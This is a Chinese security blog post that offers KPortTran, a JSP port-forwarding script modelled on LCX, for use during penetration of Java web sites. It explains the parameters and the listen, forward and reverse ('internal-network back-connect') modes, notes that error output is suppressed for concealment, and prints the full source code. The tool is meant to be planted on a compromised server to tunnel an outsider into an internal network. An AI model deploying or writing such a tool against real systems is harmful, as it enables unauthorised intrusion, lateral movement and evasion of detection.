MENU

JSP版LCX:端口转发工具 KPORTTRAN

October 26, 2013 • Security

渗透过程中,由于windows和linux的差别以及运行语言环境的限制导致端口转发经常出现问题。于是自己写了个简单的JSP的端口转发脚本。仿造LCX的功能,具有正向、反向、监听三种模式。对于目前数量众多的JAVA WEB网站来说,可以比较方便的实现端口转发。

参数

xxx.com/KPortTran.jsp?
lip = local ip / 本地ip //一般为内网主机IP
lp = local port / 本地端口 //一般为内网主机端口
rip = remote ip / 远程ip //一般为外网连接者IP,或者内网其他主机
rp = remote port / 远程端口 //一般为外网连接者端口
lp2 = local port2 / 本地端口2 //本地监听转发时的第二个端口
m = mode / 运行模式 //合法的值有:listen tran slave三种

运行模式

m = listen
需要参数:lp、lp2
该模式下,会在本地监听两个端口,相互转发数据
m = tran
需要参数:lip、lp、rip、rp
该模式为正向转发下,会在本地的lip上监听lp端口,当有连接建立时,再连接rip的rp端口。并将lip的lp上接收到的数据发向rip主机的rp端口。
m = slave
需要的参数: lip、lp、rip、rp
该模式为反向转发,会分别连接主机lip的lp端口 和 主机rip的rp端口。并转发两者数据,可用于内网反连。

注意事项:

某些server上使用时,可能由于编码问题会报错,请根据实际情况,更改代码首行的编码设置。
为了隐蔽,没有设置错误信息返回。如果不能执行,请检查一下参数。

测试截图:

listen.png

tran.png

slave.png

源码

<%@page pageEncoding="GBK"%>
<%@page import="java.io.*"%>
<%@page import="java.util.*"%>
<%@page import="java.nio.charset.*"%>
<%@page import="javax.servlet.http.HttpServletRequestWrapper"%>
<%@page import="java.net.*"%>
<%
/*code by KingX*/
class KPortTran {
    public void listen(String port1, String port2) {
        ServerSocket listenServerSocket = null;
        ServerSocket outServerSocket = null;
        try {
            listenServerSocket = new ServerSocket(Integer.parseInt(port1));
            outServerSocket = new ServerSocket(Integer.parseInt(port2));
        } catch (NumberFormatException e) {
             
        } catch (IOException e) {
        }
        Socket listenSocket = null;
        Socket outSocket = null;
        try {
            while (true) {  
                listenSocket = listenServerSocket.accept();
                outSocket = outServerSocket.accept();
                new tranThread(outSocket, listenSocket).start();
                new tranThread(listenSocket, outSocket).start();
                Thread.sleep(200);
            }
        } catch (Exception e) { 
      }
    }
 
    public void slave(String targetIP, String port1, String srcIP, String port2) throws IOException {
        InetAddress src = InetAddress.getByName(srcIP);
        InetAddress dest = InetAddress.getByName(targetIP);
        int p1 = Integer.parseInt(port1);
        int p2 = Integer.parseInt(port2);
        new Server(src, p2, dest, p1, true);
    }
 
    public void tran(String srcIP, String port1, String targetIP, String port2)
            throws NumberFormatException, IOException {
        InetAddress src = InetAddress.getByName(srcIP);
        InetAddress dest = InetAddress.getByName(targetIP);
        int p1 = Integer.parseInt(port1);
        int p2 = Integer.parseInt(port2);
        new Server(src, p1, dest, p2, false);
    }
class tranThread extends Thread {
    Socket in;
    Socket out;
    InputStream is;
    OutputStream os;
    public tranThread(Socket in, Socket out) throws IOException {
        this.is = in.getInputStream();
        this.os = out.getOutputStream();
        this.in = in;
        this.out = out;
    }
 
    private void closeSocket() {
        try {
            is.close();
            os.close();
            in.close();
            out.close();
        } catch (IOException e) {
        }
    }
    @Override
    public void run() {
        super.run();
        byte[] buffer = new byte[4096];
        int len = -1;
        try {
            while (true) {
                if (in.isClosed() || out.isClosed()|| (len = is.read(buffer, 0, buffer.length)) == -1) {
                    break;
                } else {
                    os.write(buffer, 0, len);
                    os.flush(); 
                }
            }
        } catch (IOException e) {
            closeSocket();
        } finally {
            closeSocket();
        }
    }
}
 
 
class Server extends Thread {
    InetAddress src;
    InetAddress dest;
    int p1, p2;
    boolean reverse = false;
     
    public Server(InetAddress srcIP, int srcPort, InetAddress targetIP,
            int targetPort, boolean flag) {
        this.src = srcIP;
        this.dest = targetIP;
        this.p1 = srcPort;
        this.p2 = targetPort;
        this.reverse = flag;
        start();
    }
 
    @Override
    public void run() {
        super.run();
        if (reverse) {
            try {
                Socket s = new Socket(src, p1);
                Socket s2 = new Socket(dest, p2);
                new tranThread(s, s2).start();
                new tranThread(s2, s).start();
 
                while (true) {
                    if (s2.isClosed() || s.isClosed()) {
                        if (s2.isClosed()) {
                            s2 = new Socket(dest, p2);
                        }
                        if (s.isClosed()) {
                            s = new Socket(src, p1);
                        }
                        new tranThread(s, s2).start();
                        new tranThread(s2, s).start();
                    }
                    Thread.sleep(1000);
                }
            } catch (IOException e) {
            } catch (InterruptedException e) {
            }
 
        } else {
            ServerSocket ss;
            try {
                ss = new ServerSocket(p1, 5, src);
 
                while (true) {
                    Socket s = ss.accept();
                    Socket s2 = new Socket(dest, p2);
                    new tranThread(s, s2).start();
                    new tranThread(s2, s).start();
                }
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
}
}
%>
<%
final String localIP = request.getParameter("lip");
final String localPort = request.getParameter("lp");
final String localPort2 = request.getParameter("lp2");
final String remoteIP =request.getParameter("rip");
final String remotePort =request.getParameter("rp");
final String mode =request.getParameter("m");
 
KPortTran pt = new KPortTran();
if (mode.equals("tran")) {
    pt.tran(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("slave")) {
    pt.slave(localIP, localPort, remoteIP , remotePort);
}
if (mode.equals("listen")) {
    pt.listen(localPort, localPort2);
}
%>
Tags: JSP版LCX
Archives QR Code
QR Code for this page
Tipping QR Code